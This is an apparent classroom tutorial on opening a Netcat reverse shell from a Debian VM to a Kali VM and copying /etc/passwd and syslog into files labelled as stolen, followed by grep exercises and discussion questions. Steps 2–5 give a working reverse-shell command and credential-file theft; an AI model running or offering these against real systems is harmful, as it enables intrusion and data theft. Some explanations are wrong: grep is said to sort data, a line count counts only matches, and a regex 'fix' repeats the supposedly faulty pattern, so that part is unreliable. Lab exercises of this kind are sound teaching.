Trip.com WW

Step-by-Step Guide: Reverse TCP Connection and Data Extraction from Debian VM Using Kali Linux

In this tutorial, we will demonstrate how to connect to a Debian virtual machine (VM) from a Kali Linux VM using SSH. We will then use Netcat to establish a reverse TCP connection and extract sensitive information from the Debian VM.

1. Setting Up the Listener on Kali VM

First, we need to set up a listener on Kali VM. To do so, we will listen on port 1234 using Netcat:

nc -lvp 1234

This command will make Kali VM listen for incoming connections on port 1234.

2. Establishing a Reverse TCP Connection on Debian VM

Next, on the Debian VM (IP: 192.168.83.128), we will execute the following Netcat command to create a reverse TCP connection back to Kali VM:

nc -e /bin/bash 192.168.83.129 1234

This command connects to the Kali VM (with IP 192.168.83.129) on port 1234 and provides a remote shell.

3. Confirming the Connection

Once the reverse connection is established, you should see a new connection appear in the Netcat listener on Kali. To confirm that you are connected to the Debian host, run the following command on the Debian VM:

cat /etc/issue

This will display the version of Debian running on the system.

4. Stealing Password Data

Now that we have a shell on the Debian VM, let’s gather some sensitive data. First, we’ll retrieve the contents of the /etc/passwd file, which contains user account information. We can save this data to a file called stolendata.txt:

cat /etc/passwd > stolendata.txt

To verify that the data has been saved, we can open the file with the following command:

cat stolendata.txt

In the file, we’ll see two user accounts with /bin/bash shell access: root and password.

5. Stealing the Syslog

Next, we’ll capture system log information. The syslog file can provide valuable insights into system activities and events. Let’s steal the contents and store them in a file called stolenlog.txt:

cat /var/log/syslog > stolenlog.txt

6. Analyzing the Stolen Log File

Once we have the log file, let’s check the contents. We can use the following commands to inspect the first few lines and the last few lines of the file.

To view the first 10 lines:

head stolenlog.txt
OR
head -n 10 stolenlog.txt

To view the last 10 lines:

tail -n 10 stolenlog.txt
OR
tail stolenlog.txt

7. Sorting the Data

The log file may contain some numeric data, potentially including IP addresses or other identifiers. To sort the file based on numeric values (such as IP addresses), use the following command:

grep -E '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

This will help you organize the data for easier analysis.

8. Counting Lines in the File

If the log file is too large to sift through manually, you can check the number of lines in the file with the following command:


grep -cE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

9. Extracting Specific IP Address

If you're specifically looking for an IP address or any specific numeric data within the log file, you can use grep to filter the data. For instance:

grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

This command will display any IP addresses found in the stolenlog.txt file.

Discussion Questions

1. What is an issue with this IP address search pattern?

The pattern used to search for IP addresses with three digits only (e.g., ([0-9]{1,3}\.){3}[0-9]{1,3}) will fail to capture IP addresses that contain two-digit segments (such as 192.168.12.1). To account for two-digit and one-digit segments, you can modify the regular expression to use {1,3} to allow for 1 to 3 digits. For example:

grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' stolenlog.txt

This works only for IPv4 addresses, so for IPv6 addresses, additional adjustments to the regex would be required.

2. How would being able to search for IP addresses in logs be useful in security?

Logs are essential in tracking system activities. They provide valuable information on what services were running, what actions were executed, which ports were in use, and much more. Being able to search for IP addresses in logs is crucial in security for identifying suspicious activities or unauthorized access. For example, if an IP address appears repeatedly in error logs, or if a new IP is seen accessing sensitive files, security teams can investigate further to mitigate any potential threat.

3. What other numbers may be important to search for on a computer?

Besides IP addresses, other numbers that are important to search for include:

  • Port Numbers: Port numbers indicate which services or applications are running on specific ports. Monitoring port activity helps identify unauthorized or malicious services.

  • MAC Addresses: These are unique identifiers assigned to network interfaces, essential for identifying devices within a network. MAC addresses can be crucial in tracking the physical devices involved in network activities.

By searching for these and other key identifiers, security professionals can better understand what is happening on a system and take appropriate action when needed.

Conclusion

In this article, we demonstrated how to connect to a Debian VM from Kali Linux via SSH, set up a reverse TCP connection using Netcat, and extract sensitive data such as the system’s user information and logs. While this exercise showcases how attackers might operate, it’s important to always secure systems and networks to prevent unauthorized access and protect sensitive information.

Previous
Next Post »

Subscribe to our mailing list

* indicates required
Select your Interested Topics.